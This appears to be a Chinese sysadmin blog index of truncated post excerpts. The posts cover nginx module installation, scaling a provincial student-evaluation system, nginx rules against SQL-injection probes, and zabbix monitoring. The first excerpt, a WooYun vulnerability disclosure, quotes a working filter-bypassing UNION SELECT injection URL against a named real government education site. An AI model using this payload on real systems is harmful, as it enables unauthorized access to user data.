漏洞编号：WooYun-2012-04939 详细说明： 因其中简单过滤括号和空格，导致可以绕过过滤进行注入。比如随便在教育厅主页打开几个网站测试。 主站：http://gov.e21.cn/school_show.php?college_id=96+/*!and*/+1=2+/*!uNioN*/+/*!seLecT*/+1,user_name,3…

模块有个简单的文档 http://www.grid.net.ru/nginx/mogilefs.en.html 安装 #wget http://www.grid.net.ru/nginx/download/nginx_mogilefs_module-1.0.4.tar.gz #tar zxvf nginx_mogilefs_module-1.0.4…

近一段時間一直在做全省高一階段的綜合素質評價系統的運維，短時間內用戶幷發很高操作很多流量也比較大，在維護過程中一直跌跌撞撞遇到很多問題，目前已經告一段落。問題很多，收穫也很多，我想有必要系統的總結一下。 整體系統狀況如下： 主要功能是全省高中學生的網上素質評價，大約40w用戶，每個班內學生需要互評，以每個班60人計算，最大的互評表規模60*40w=…

这几天sql-inject的量有些大，每天snort记录的扫描探测都有几万条。特别是有一些小分网站脚本陈旧，这方面的处理存在很大漏洞，的确存在一些sql-inject的漏洞，有些探测已经得到了web应用的用户管理表数据。脚本众多，要协调程序部门修改是一个过程，很头疼。只好临时在nginx上做了一些URL判断，把符合规则的一些url访问导向到临时页面…

由于大部分web服务器的apache都更换为了nginx，zabbix中以前http进程监控也需要调整了。在zabbix中可以自定义监控变量，通过自己写的bash脚本来抓取相关信息返回给zabbix server，这里我们需要在运行zabbix agent的服务器上编辑/etc/zabbix/zabbix_agentd.conf，增加下行：User…